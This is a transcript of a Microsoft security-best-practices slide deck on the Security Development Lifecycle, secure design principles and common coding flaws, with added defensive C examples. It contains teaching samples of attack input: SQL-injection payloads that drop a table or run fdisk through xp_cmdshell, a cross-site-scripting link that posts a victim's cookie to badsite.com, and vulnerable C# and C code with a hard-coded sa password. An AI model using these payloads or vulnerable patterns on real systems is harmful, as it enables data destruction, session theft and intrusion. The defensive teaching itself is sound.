Security Best Practices
Clint Edmonson
Architect Evangelist
Microsoft Corporation
clinted@microsoft.com
Agenda
- Microsoft Security Development Lifecycle
- Secure Design Principles
- Clint's Dirty Dozen

Microsoft Security Development Lifecycle (SDL)
- Executive commitment: SDL a mandatory policy at Microsoft since 2004
- Education
- Accountability
- Technology and Process
- Ongoing Process Improvements: 6 month cycle
SDL Product Development Timeline
Milestones: Concept -> Designs Complete -> Test Plans Complete -> Code Complete -> Ship -> Post Ship
Security activities placed along the timeline:
- Security questions during interviews
- Team member training
- Threat analysis
- Security sign-off criteria determined
- Review old defects
- Secure coding guidelines
- Use tools
- Data mutation & least privilege tests
- Check-ins checked
- Security push
- Security audit
- SWI review
- External review
- Learn & refine
SDL Activities
SDL Maturity Levels
SDL Secure Design Principles
Core SDL secure design principles:
- Attack Surface Reduction
- Basic Privacy
- Threat Modeling
- Defense in Depth
- Least Privilege
- Secure Defaults

SDL Core Principle: Attack Surface Reduction
- Attack Surface: any part of an application that is accessible by a human or another program
- Each one of these can potentially be exploited by a malicious user
- Attack Surface Reduction: minimize the number of exposed attack surface points a malicious user can discover and attempt to exploit
Attack Surface Example
Attack Surface Analysis
Entry points:
- Network inputs/outputs
- File inputs/outputs
- Etc.
Attributes of each entry point:
- Authenticated or non-authenticated
- Administrative or user-level access
- Network or local
- UDP or TCP
- Etc.

Attack Surface Analysis Tips
- Iterative process: for all features you also need to analyze their sub-features
- Restrict access to features as much as possible
It’s Not Just About Turning Things Off
Attack Surface Reduction Examples
SDL Core Principle: Basic Privacy
Security versus Privacy
- Security: establishing protective measures that defend against hostile acts or influences and protect the confidentiality of personal information
- Privacy: empowering users to control the use, collection and distribution of their personal information
- Security AND Privacy together are key factors to trustworthy computing

Important Note: Security Does Not Always Guarantee Privacy
- It is possible to have a secure system that does not preserve users' privacy.
Authentication vs. Authorization
- Authentication: verify who they are
- Authorization: verify what they can access
Understanding Privacy Behaviors and Concerns
Microsoft Privacy Guidelines for Developing Products and Services
- Documented requirements and recommendations for privacy-compliant products and services
- Available online for download
- Microsoft customers will be empowered to control the collection, use, and distribution of their personal information

SDL Core Principle: Threat Modeling
- Threat Modeling: a process to understand threats to an application
Threats and vulnerabilities
- Threats: actions a malicious user may attempt in order to compromise a system
- Vulnerabilities: a specific way a threat is exploitable, such as a coding error
Threat Modeling In a Nutshell (diagram: Product / Development)

Microsoft Threat Modeling Tool
- Microsoft has published the threat modeling tool it uses internally to assess threats against products and services
- Freely available online for download

SDL Core Principle: Defense In Depth
- Defense in Depth: if one defense layer is breached, what other defense layers (if any) provide additional protection to the application?
- Assume that software and/or hardware will fail at some point
- Most applications today can be compromised when a single, and often only, layer of defense is breached (firewall)
Defense in Depth Example
Defense Hotspots
Source: http://shapingsoftware.com/2009/03/09/security-hot-spots/

SDL Core Principle: Least Privilege
- Assume that all applications can and will be compromised
- Least Privilege: if an application is compromised, then the potential damage that the malicious person can inflict is contained and minimized accordingly
Least Privilege Example
What a compromised application can do at each access level:
ADMIN / SYSTEM LEVEL (LOCAL SYSTEM):
- Read user files
- Change system passwords
- Download malicious files
- Anything
NON-ADMIN:
- Read user files
- Change system passwords
- Download malicious files
- Limited capabilities

Least Privilege Tips
- Evaluate your application and think minimally!
- What is the minimum access level your application requires to perform its functions?
- Elevate privileges only when needed, and then release those elevated privileges when their purposes have been satisfied

SDL Core Principle: Secure Defaults
- Secure Defaults: deploy applications in more secure configurations by default.
- Helps to better ensure that customers get a safer experience with your application out of the box, not after extensive configuration
- It is up to the user to reduce security and privacy levels
Secure Defaults Examples
Clint's Dirty Dozen
- Client-side enforcement of server-side security
- Improper input validation
- Clear transmission of sensitive information
- Failure to preserve SQL query integrity
- Cross-site request forgery (HTML output integrity)
- Error message information leak
- File or path name leaking
- Critical state data exposure
- Improper access control (authorization)
- Use of broken or risky cryptography algorithms
- Hard-coded passwords
- Execution with unnecessary privileges
- Failure to constrain operations within memory buffers (buffer overrun), a concern in unmanaged languages

Conclusion
- Safer applications begin with secure planning and design
- SDL core principles: Attack Surface Reduction, Basic Privacy, Threat Modeling, Defense in Depth, Least Privilege, Secure Defaults
Questions?
More Info
Microsoft Security Development Lifecycle (SDL)
- SDL Book: http://www.microsoft.com/mspress/books/8753.aspx
- Official SDL Web Site: http://www.microsoft.com/sdl

Threat Modeling Resources
- Threat Modeling Book: http://www.microsoft.com/mspress/books/6892.aspx
- Threat Modeling Tool: http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en

Microsoft Developer Network (MSDN) Security Developer Center
- Official Web site: http://msdn.microsoft.com/security

Secure Development Blogs
- The Microsoft Security Development Lifecycle (SDL) Blog: http://blogs.msdn.com/sdl
- Michael Howard's Blog: http://blogs.msdn.com/michael_howard
- J.D. Meier's Security Hotspots: http://shapingsoftware.com/2009/03/09/security-hot-spots
- SANS Institute Top 25 Most Dangerous Programming Errors: http://www.sans.org/top25errors

Clint Edmonson
Architect Evangelist
Microsoft Corporation
clinted@microsoft.com
Slides available at: http://www.notsotrivial.net/slides

© 2002 Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
Appendix
Secure Design Tenets
- Reduce Attack Surface
- Defense in Depth
- Least Privilege
- Secure Defaults
- Learn from Past Mistakes
- Security is a Feature
- Provide Application Diversity

Reducing Attack Surface
- Less code running by default = less stuff to whack by default
- Slammer/CodeRed would not have happened if the features were not on by default
- ILoveYou (etc.) would not have happened if scripting was off
- Requires less admin skill
- Reduces the urgency to deploy security fixes
- Usability often means "automatically"

Input Trust Issues
- "All input is evil, until proven otherwise!"
- The root of most vulnerabilities: buffer overruns, canonicalization issues, cross-site scripting (XSS) attacks, SQL injection attacks
- Good guys give you well-formed data, bad guys don't!
- Don't rely on your client application providing clean data
- Don't assume attackers play by the rules; they go 'under the radar'

Buffer Overruns
- Been around forever
- Primarily a C/C++ issue: programming close to the metal!
- Prime example of sloppy programming!
- Aim is to change the flow of execution so the attacker's code is called
- Lack of diversity helps the attacker
(Chapter 5)
Buffer Overruns at Work
Stack frame, lowest to highest address: buffers, other vars, saved EBP, EIP (return address), args

    void foo(char *p, int i) {
        int j = 0;                   // other local
        CFoo foo;                    // object with virtual methods (vtable pointer)
        int (*fp)(int) = &func;      // function pointer: also decides where execution goes
        char b[16];                  // the local buffer an overrun spills out of
    }

Buffer Overruns at Work
- Same frame: buffers, other vars, saved EBP, EIP, args; the function return address lies at the higher addresses an overrun grows toward: 0wn3d!
- Exception handlers, function pointers, virtual methods: all determine execution flow

Buffer Overrun Results
- If you're lucky, you get an AV: denial of service against servers
- If you're unlucky, you get instability; best of luck debugging that one!
- If you're really unlucky, the attacker injects code into your process, and executes it
Buffer Overrun Examples
Index Server ISAPI Application (CodeRed), the vulnerable code:

    // cchAttribute is char count of user input
    WCHAR wcsAttribute[200];
    if ( cchAttribute >= sizeof wcsAttribute )       // BUG: a character count compared with a byte count
        THROW( CException( DB_E_ERRORSINCOMMAND ) );
    DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute,
                      wcsAttribute, webServer.CodePage() );
    ...
    void DecodeURLEscapes( BYTE * pIn, ULONG & l,
                           WCHAR * pOut, ULONG ulCodePage ) {
        WCHAR * p2 = pOut;
        ULONG l2 = l;
        ...
        for( ; l2; l2-- ) {
            // write to p2 based on pIn, up to l2 bytes

Buffer Overrun Examples
Index Server ISAPI Application (CodeRed), FIXED! The check now compares the character count with the buffer's element count:

    // cchAttribute is char count of user input
    WCHAR wcsAttribute[200];
    if ( cchAttribute >= sizeof wcsAttribute / sizeof WCHAR )   // element count, same unit as cchAttribute
        THROW( CException( DB_E_ERRORSINCOMMAND ) );
    DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute,
                      wcsAttribute, webServer.CodePage() );
    ...
    void DecodeURLEscapes( BYTE * pIn, ULONG & l,
                           WCHAR * pOut, ULONG ulCodePage ) {
        WCHAR * p2 = pOut;
        ULONG l2 = l;
        ...
        for( ; l2; l2-- ) {
            // write to p2 based on pIn, up to l2 bytes
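The byte-count versus element-count mix-up behind the CodeRed slide, worked through in portable C. This is an added example, not the Index Server code; `decode_url_escapes` is a hypothetical stand-in for the slide's DecodeURLEscapes that takes its output bound in elements and checks it on every write, and the two `accepts_length_*` functions are the slide's check in its buggy and fixed forms.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

#define ATTR_ELEMS 200   /* the slide's WCHAR wcsAttribute[200] */

/* The slide's length check in both forms. cch_attribute is a CHARACTER count,
 * so it must be compared with the buffer's ELEMENT count. sizeof yields bytes,
 * and sizeof(wchar_t) > 1, so the byte form admits inputs several times too
 * long. Each function returns 1 when the input would be accepted. */
int accepts_length_buggy(size_t cch_attribute)
{
    wchar_t wcs_attribute[ATTR_ELEMS];
    (void)wcs_attribute;
    return cch_attribute < sizeof wcs_attribute;                           /* bytes: wrong */
}

int accepts_length_fixed(size_t cch_attribute)
{
    wchar_t wcs_attribute[ATTR_ELEMS];
    (void)wcs_attribute;
    return cch_attribute < sizeof wcs_attribute / sizeof wcs_attribute[0]; /* elements: right */
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hypothetical stand-in for DecodeURLEscapes: decodes %XX escapes from a
 * narrow input into a wide buffer. Unlike the original, the output capacity is
 * given in ELEMENTS and enforced on every write, so a wrong caller-side check
 * can no longer turn into an overrun. Returns the number of wide characters
 * written, or -1 on malformed input or a full buffer. */
long decode_url_escapes(const char *in, size_t in_len, wchar_t *out, size_t out_elems)
{
    size_t i = 0, written = 0;
    if (out_elems == 0) return -1;
    while (i < in_len) {
        wchar_t ch;
        if (in[i] == '%') {
            if (i + 2 >= in_len) return -1;                 /* truncated escape */
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0) return -1;
            ch = (wchar_t)((hi << 4) | lo);
            i += 3;
        } else {
            ch = (wchar_t)(unsigned char)in[i];
            i += 1;
        }
        if (written + 1 >= out_elems) return -1;            /* keep room for L'\0' */
        out[written++] = ch;
    }
    out[written] = L'\0';
    return (long)written;
}

/* Demonstration helper: decode `in` into an 8-element buffer and report
 * whether the result equals `expected` (1) or the decoder refused (0). */
int decode_into_8_equals(const char *in, const wchar_t *expected)
{
    wchar_t buf[8];
    long n = decode_url_escapes(in, strlen(in), buf, sizeof buf / sizeof buf[0]);
    return n >= 0 && wcscmp(buf, expected) == 0;
}
```

On a platform with a 4-byte wchar_t the buggy check lets a 799-character attribute through into a 200-element buffer; the fixed check and the decoder's own bound both stop at 199.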
Using strncpy
- Naïve use of strncpy is no fix
- May not null-terminate the string (the Shell version, StrCpyN, and Windows lstrcpy do, however)
- Performance issues
- Third arg: sizeof mix-ups, off-by-one errors; it must be the total size of the destination buffer
- Consider strsafe.h/ntstrsafe.h: in Platform SDK, MSDN and VS.NET 2003

The VC++ /GS Flag
- A VC++.NET compile-time option that adds run-time code to certain functions (unmanaged C/C++)
- A random value called a 'cookie' is inserted into the stack
- Validates that various stack data is not corrupt
- Most of Windows Server 2003 and VS.NET is compiled with this option
- Windows XP SP2
- Minimal perf hit: 4 instructions!

What /GS is NOT
- A panacea
- A cure for lazy developers! Crap code + /GS == crap code!
- Only catches some stack-smashing attacks
- No heap protection
- It's an insurance policy

Fixing Buffer Overruns
- Trace data coming in from the 'outside'
- Watch for data as it moves from untrusted to trusted boundaries
- Build appropriate test plans using data mutation
- Be wary of certain functions: strcpy, CopyMemory, MultiByteToWideChar, sprintf(...,"%s",...)
  - Refer to Writing Secure Code 2nd Edition for the list
  - APIs which use byte vs. char counts
- No such thing as 'bad functions', only 'bad developers'
- Not limited to copy functions
- Compile with /GS
- Windows Server 2003 on AMD Opteron adds the /noexecute boot option
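The two strncpy pitfalls the slide names, the missing terminator and the size-argument mix-up, shown side by side with a helper that avoids them. Added example, not from the slides and not strsafe.h; `safe_copy` is a hypothetical helper that takes the total destination size, always terminates, and reports truncation instead of hiding it.

```c
#include <stddef.h>
#include <string.h>

typedef enum { COPY_OK = 0, COPY_TRUNCATED = 1, COPY_BAD_ARGS = 2 } copy_result;

/* dst_size is the TOTAL size of the destination (what sizeof gives for a char
 * array). The result is always NUL-terminated, and truncation is reported
 * rather than silently producing an unterminated string. */
copy_result safe_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0) return COPY_BAD_ARGS;
    size_t len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);   /* keep what fits ... */
        dst[dst_size - 1] = '\0';         /* ... and always terminate */
        return COPY_TRUNCATED;
    }
    memcpy(dst, src, len + 1);            /* includes the NUL */
    return COPY_OK;
}

/* The naive pattern: strncpy(dst, src, sizeof dst) leaves no terminator when
 * src fills the buffer. dst is pre-filled with 'X' to stand in for stale
 * stack contents. Returns 1 if a NUL ended up inside dst. */
int naive_strncpy_terminated(const char *src)
{
    char dst[8];
    memset(dst, 'X', sizeof dst);
    strncpy(dst, src, sizeof dst);
    return memchr(dst, '\0', sizeof dst) != NULL;
}

/* Same check with safe_copy: always terminated. */
int safe_copy_terminated(const char *src)
{
    char dst[8];
    memset(dst, 'X', sizeof dst);
    safe_copy(dst, sizeof dst, src);
    return memchr(dst, '\0', sizeof dst) != NULL;
}

/* Copy src into an 8-byte buffer; returns the result code and, through
 * *matched (if non-NULL), whether the buffer ended up equal to `expected`. */
copy_result copy_into_8(const char *src, const char *expected, int *matched)
{
    char dst[8] = {0};
    copy_result r = safe_copy(dst, sizeof dst, src);
    if (matched) *matched = (expected != NULL && strcmp(dst, expected) == 0);
    return r;
}

int copy_into_8_gives(const char *src, const char *expected)
{
    int matched = 0;
    copy_into_8(src, expected, &matched);
    return matched;
}
```

A caller that ignores COPY_TRUNCATED is still making a decision on a silently shortened string, so the return value should be checked wherever the copied value feeds a later comparison or path lookup.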
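A small model of what the /GS cookie does and why it is only an insurance policy, as an added example; this is illustration code, not the Visual C++ implementation. The struct stands in for a stack frame, the cookie value is a constructed constant standing in for the per-process random cookie, and `gs_check_passes_after_copy` performs the unchecked copy followed by the epilogue check the compiler would emit.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Layout mimicking a stack frame: the local buffer sits at the lowest
 * address, the cookie between it and the saved return address, so a
 * sequential overrun that reaches the return address passes through the
 * cookie first. */
typedef struct {
    char      buffer[16];
    uint32_t  cookie;          /* set on entry, checked before return */
    uintptr_t saved_return;    /* the value an overrun ultimately corrupts */
} model_frame;

/* Stand-in for the per-process random cookie (constructed constant; the real
 * thing is drawn at process start). */
static const uint32_t g_security_cookie = 0xBB40E64Eu;

/* Copies `len` bytes of input into the frame with NO bounds check (the bug
 * /GS insures against), then performs the cookie check. Returns 1 if the
 * check passes, 0 if the overrun was detected. The copy is clamped to the
 * frame so the model itself never writes outside the object. */
int gs_check_passes_after_copy(const unsigned char *input, size_t len)
{
    model_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.cookie = g_security_cookie;
    frame.saved_return = 0x1000;
    if (len > sizeof frame) len = sizeof frame;
    memcpy(&frame, input, len);          /* the unchecked copy */
    return frame.cookie == g_security_cookie;
}

/* Demonstration: an input of `len` bytes of 'A' (constructed sample). */
int gs_check_passes_for_len(size_t len)
{
    unsigned char input[sizeof(model_frame)];
    memset(input, 'A', sizeof input);
    return gs_check_passes_after_copy(input, len);
}
```

Sixteen bytes fit and the check passes; a single byte beyond the buffer changes the cookie and the check fails, which is the only thing the cookie can tell you: the frame was corrupted. It says nothing about heap buffers or data that sits below the cookie, which is the slide's point.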
Canonicalization Issues
- Never make a decision based on the name of a file
- Chances are good that you'll get it wrong
- Often, there is more than one way to name something

The Same File!
- MySecretFile.txt
- MySecretFile.txt.
- MySecr~1.txt
- MySecretFile.txt::$DATA

The Same URL!
- http://www.foo.com
- http://www%2efoo%2ecom
- http://www%252efoo%2ecom
- http://172.43.122.12
- http://2888530444

The Turkish-I problem (applies also to Azerbaijan!)
- Turkish has four letter 'I's: i (U+0069), ı (U+0131), İ (U+0130), I (U+0049)
- In the Turkish locale UC("file") == "FİLE"

Block-list check that locale-dependent casing defeats:

    // Do not allow "FILE://" URLs
    if (url.ToUpper().Left(4) == "FILE")
        return ERROR;
    getStuff(url);

Allow-list check with invariant-culture casing:

    // Only allow "HTTP://" URLs
    if (url.ToUpper(CULTURE_INVARIANT).Left(4) == "HTTP")
        getStuff(url);
    else
        return ERROR;
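The three canonicalization points from the slides above (the decimal and dotted spellings of one address, single versus double percent-encoding, and locale-independent scheme comparison) worked through in C. Added example, not from the slides; the function names are hypothetical, and the scheme check deliberately requires the ':' after the scheme, which is stricter than the slide's Left(4).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 1. Host canonicalisation: "172.43.122.12" and "2888530444" name the same
 *    address. Parse both spellings to one 32-bit value and compare the values,
 *    never the strings. Accepts only dotted-quad and plain-decimal forms. */
static int is_digit_ascii(int c) { return c >= '0' && c <= '9'; }

int parse_ipv4_host(const char *s, uint32_t *out)
{
    uint32_t parts[4];
    int n = 0;
    const char *p = s;
    for (;;) {
        if (!is_digit_ascii((unsigned char)*p)) return 0;
        uint64_t v = 0;
        while (is_digit_ascii((unsigned char)*p)) {
            v = v * 10 + (uint64_t)(*p - '0');
            if (v > 0xFFFFFFFFu) return 0;
            p++;
        }
        if (n == 4) return 0;                    /* too many parts */
        parts[n++] = (uint32_t)v;
        if (*p == '.') { p++; continue; }
        if (*p == '\0') break;
        return 0;                                /* stray character */
    }
    if (n == 1) { *out = parts[0]; return 1; }   /* plain decimal */
    if (n != 4) return 0;                        /* 2- and 3-part shorthand rejected */
    for (int i = 0; i < 4; i++) if (parts[i] > 255) return 0;
    *out = (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3];
    return 1;
}

int same_host(const char *a, const char *b)
{
    uint32_t x, y;
    return parse_ipv4_host(a, &x) && parse_ipv4_host(b, &y) && x == y;
}

/* 2. Percent-decoding: decode exactly once, then treat any '%' that survives
 *    as double encoding (www%252efoo%2ecom) and refuse it. Returns the decoded
 *    length, -1 on malformed or oversized input, -2 when a '%' remains. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

long percent_decode_once(const char *in, char *out, size_t out_size)
{
    size_t w = 0;
    for (size_t i = 0; in[i] != '\0'; ) {
        char ch;
        if (in[i] == '%') {
            if (in[i + 1] == '\0' || in[i + 2] == '\0') return -1;
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0) return -1;
            ch = (char)((hi << 4) | lo);
            i += 3;
        } else {
            ch = in[i];
            i += 1;
        }
        if (w + 1 >= out_size) return -1;
        out[w++] = ch;
    }
    out[w] = '\0';
    return strchr(out, '%') != NULL ? -2 : (long)w;
}

long decode_host_code(const char *in)
{
    char buf[64];
    return percent_decode_once(in, buf, sizeof buf);
}

int decode_host_equals(const char *in, const char *expected)
{
    char buf[64];
    return percent_decode_once(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

/* 3. Scheme check without the Turkish-I problem: fold only ASCII a-z, never
 *    toupper() under the current locale. `scheme` is given in upper case. */
static int ascii_upper(int c) { return (c >= 'a' && c <= 'z') ? c - 'a' + 'A' : c; }

int has_scheme_ascii_ci(const char *url, const char *scheme)
{
    size_t i;
    for (i = 0; scheme[i] != '\0'; i++)
        if (url[i] == '\0' || ascii_upper((unsigned char)url[i]) != (unsigned char)scheme[i]) return 0;
    return url[i] == ':';
}
```

The last two tests below show why the slide moves from a block list to an allow list: a scheme spelled with the dotless ı does not match "FILE" under ASCII folding, so a block list would wave it through, while the allow-list check for "HTTP" rejects it along with everything else that is not plainly HTTP.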
SQL Injection – C#
The vulnerable code, as written on the slide:

    string Status = "No";
    string sqlstring = "";
    try {
        SqlConnection sql = new SqlConnection(
            @"data source=localhost;" +
            "user id=sa;password=password;");
        sql.Open();
        sqlstring = "SELECT HasShipped" +
            " FROM detail WHERE ID='" + Id + "'";      // user-supplied Id concatenated straight into the query
        SqlCommand cmd = new SqlCommand(sqlstring, sql);
        if ((int)cmd.ExecuteScalar() != 0)
            Status = "Yes";
    } catch (SqlException se) {
        Status = sqlstring + " failed\n\r";
        foreach (SqlError e in se.Errors) {
            Status += e.Message + "\n\r";
        }
    } catch (Exception e) {
        Status = e.ToString();
    }

Why It's Wrong (1 of 2)
- Good Guy, ID: 1001
      SELECT HasShipped FROM detail WHERE ID='1001'
- Not so Good Guy, ID: 1001' or 1=1 --
      SELECT HasShipped FROM detail WHERE ID='1001' or 1=1 -- '

Why It's Wrong (2 of 2)
- Really Bad Guy, ID: 1001'; drop table orders --
      SELECT HasShipped FROM detail WHERE ID='1001'; drop table orders -- '
- Downright Evil Guy, ID: 1001'; exec xp_cmdshell('fdisk.exe') --
      SELECT HasShipped FROM detail WHERE ID='1001'; exec xp_cmdshell('fdisk.exe') -- '
Cross Site Scripting
- Very common vulnerability
- The Nov01 Passport issue was CSS
- A flaw in a server that leads to compromise in a client
- The fault is simply echoing user input! And trusting user input!

CSS In Action
- The attacker owns badsite.com
- Welcome.asp on the target site echoes the query string unencoded:
      Hello, <%= request.querystring('name') %>

CSS In Action
The link the victim is lured into clicking; the name parameter carries a form and script that post the victim's cookie to badsite.com:

    <a href="http://www.insecuresite.com/welcome.asp?name=
      <FORM action=http://www.badsite.com/data.asp
            method=post id="idForm">
        <INPUT name="cookie" type="hidden">
      </FORM>
      <SCRIPT>
        idForm.cookie.value=document.cookie;
        idForm.submit();
      </SCRIPT>">here</a>

Input Remedies
- All input is evil until proven otherwise
- Require authenticated connections
- Sanitize all input: look for valid data, reject everything else
  - High-level languages can use RegExp, e.g. SSN = ^\d{3}-\d{2}-\d{4}$
- Make no assumptions about the trustworthiness of data
- Never directly echo Web-based user input: verify input, then echo it; at the very least, HTML or URL encode the output
- ASP.NET adds the ValidateRequest option
- Use SQL parameterized queries
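The input remedies applied to the two preceding slides: an allow-list check that rejects the "1001' or 1=1 --" order ID before it reaches any query, the slide's SSN pattern, and HTML encoding for the Welcome.asp echo. Added example in portable C, not from the slides; it uses POSIX regex.h (which has no \d, so the slide's pattern is spelled with [0-9]), and the function names are hypothetical. Validation is the first layer only; the query itself should still be a parameterized command, as the slide says.

```c
#include <regex.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 only when the whole input matches the POSIX ERE pattern. */
int matches_pattern(const char *pattern, const char *input)
{
    regex_t re;
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0) return 0;
    int rc = regexec(&re, input, 0, NULL, 0);
    regfree(&re);
    return rc == 0;
}

/* The slide's ^\d{3}-\d{2}-\d{4}$ in POSIX ERE spelling. */
int is_valid_ssn(const char *s)
{
    return matches_pattern("^[0-9]{3}-[0-9]{2}-[0-9]{4}$", s);
}

/* The order ID from the SQL-injection slide is a number: look for valid data,
 * reject everything else. A quote, a space or "--" never gets past this. */
int is_valid_order_id(const char *s)
{
    return matches_pattern("^[0-9]{1,10}$", s);
}

/* Minimal HTML encoding of the characters that let echoed input become
 * markup. Writes into out; returns the encoded length or -1 if out is too
 * small. */
long html_encode(const char *in, char *out, size_t out_size)
{
    size_t w = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        char one[2] = { in[i], '\0' };
        const char *rep;
        switch (in[i]) {
            case '<':  rep = "&lt;";   break;
            case '>':  rep = "&gt;";   break;
            case '&':  rep = "&amp;";  break;
            case '"':  rep = "&quot;"; break;
            case '\'': rep = "&#39;";  break;
            default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (w + n + 1 > out_size) return -1;
        memcpy(out + w, rep, n);
        w += n;
    }
    out[w] = '\0';
    return (long)w;
}

int html_encode_equals(const char *in, const char *expected)
{
    char buf[256];
    return html_encode(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}
```

Encoded this way, a name parameter containing a SCRIPT element is rendered as the literal text "<SCRIPT>" rather than executed, which is the "at the very least" remedy from the slide.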
Storing Secrets
- Storing secrets securely in software is impossible! ...But you can raise the bar!
- Embedded 'secrets' don't stay secret for long

Storing Secrets
- DPAPI is the recommended method: Crypt[Un]ProtectData
- Requires Windows 2000 and later
- Preferable to LSA secrets
- Easy! You store the encrypted secret; you can back the data up
- DPAPI provides an integrity check
- No need to run as admin: the account that encrypts the data decrypts the data

Storing Secrets in Memory
Process:
- Acquire data
- Encrypt it
- Decrypt it
- Use it
- Scrub it
Functions:
- Crypt[Un]ProtectMemory (requires Windows Server 2003 and later)
- Rtl[En|De]cryptMemory (now in Platform SDK)
- SecureZeroMemory
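The "use it, scrub it" step of the slide's process in portable C, as an added example; it is not the Windows API and does not cover the encrypt/decrypt steps, which are platform calls (Crypt[Un]ProtectMemory). `secure_zero` is a hypothetical SecureZeroMemory equivalent, and the secret bytes are a constructed sample.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* A plain memset right before a buffer goes out of scope is a dead store the
 * optimiser is allowed to delete; writes through a volatile pointer are not. */
void secure_zero(void *p, size_t n)
{
    volatile unsigned char *vp = (volatile unsigned char *)p;
    while (n--) *vp++ = 0;
}

/* Decrypt -> use -> scrub, applied to a caller-supplied buffer standing in for
 * the decrypted plaintext window. "Use" is a checksum so the caller can see
 * the secret was available in between. The buffer is scrubbed before return. */
uint32_t use_then_scrub(unsigned char *plaintext, size_t n)
{
    uint32_t sum = 0;
    for (size_t i = 0; i < n; i++) sum = sum * 31u + plaintext[i];
    secure_zero(plaintext, n);            /* scrub as soon as the use is done */
    return sum;
}

int is_all_zero(const unsigned char *p, size_t n)
{
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++) acc |= p[i];
    return acc == 0;
}

/* Demonstration: load a constructed secret, use it, and return 1 if the
 * checksum matched the value computed beforehand AND nothing of the secret
 * remains in the buffer afterwards. */
int demo_scrub_roundtrip(void)
{
    unsigned char secret[8] = { 's', '3', 'c', 'r', '3', 't', '!', '!' };  /* constructed sample */
    uint32_t expected = 0;
    for (size_t i = 0; i < sizeof secret; i++) expected = expected * 31u + secret[i];
    uint32_t got = use_then_scrub(secret, sizeof secret);
    return got == expected && is_all_zero(secret, sizeof secret);
}
```

The window in which the plaintext exists is the body of `use_then_scrub`; keeping that window short and ending it with a scrub the compiler cannot elide is what the slide's process amounts to.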
Clint Edmonson
 
Code smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software OdorsCode smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software Odors
Clint Edmonson
 
State of agile 2016
State of agile 2016State of agile 2016
State of agile 2016
Clint Edmonson
 
Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015
Clint Edmonson
 
Application Architecture Jumpstart
Application Architecture JumpstartApplication Architecture Jumpstart
Application Architecture Jumpstart
Clint Edmonson
 
Agile Metrics That Matter
Agile Metrics That MatterAgile Metrics That Matter
Agile Metrics That Matter
Clint Edmonson
 
Advanced oop laws, principles, idioms
Advanced oop laws, principles, idiomsAdvanced oop laws, principles, idioms
Advanced oop laws, principles, idioms
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
ADO.NET Entity Framework
ADO.NET Entity FrameworkADO.NET Entity Framework
ADO.NET Entity Framework
Clint Edmonson
 
Windows 8 - The JavaScript Story
Windows 8 - The JavaScript StoryWindows 8 - The JavaScript Story
Windows 8 - The JavaScript Story
Clint Edmonson
 
Windows Azure Jumpstart
Windows Azure JumpstartWindows Azure Jumpstart
Windows Azure Jumpstart
Clint Edmonson
 
Introduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual MachinesIntroduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual Machines
Clint Edmonson
 
Peering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to MasterPeering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to Master
Clint Edmonson
 
Architecting Scalable Applications in the Cloud
Architecting Scalable Applications in the CloudArchitecting Scalable Applications in the Cloud
Architecting Scalable Applications in the Cloud
Clint Edmonson
 
Windows Azure jumpstart
Windows Azure jumpstartWindows Azure jumpstart
Windows Azure jumpstart
Clint Edmonson
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
Clint Edmonson
 
New Product Concept Design.pptx
New Product Concept Design.pptxNew Product Concept Design.pptx
New Product Concept Design.pptx
Clint Edmonson
 
Lean & Agile Essentials
Lean & Agile EssentialsLean & Agile Essentials
Lean & Agile Essentials
Clint Edmonson
 
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
Clint Edmonson
 
Flow, the Universe and Everything
Flow, the Universe and EverythingFlow, the Universe and Everything
Flow, the Universe and Everything
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
Code smells and Other Malodorous Software Odors
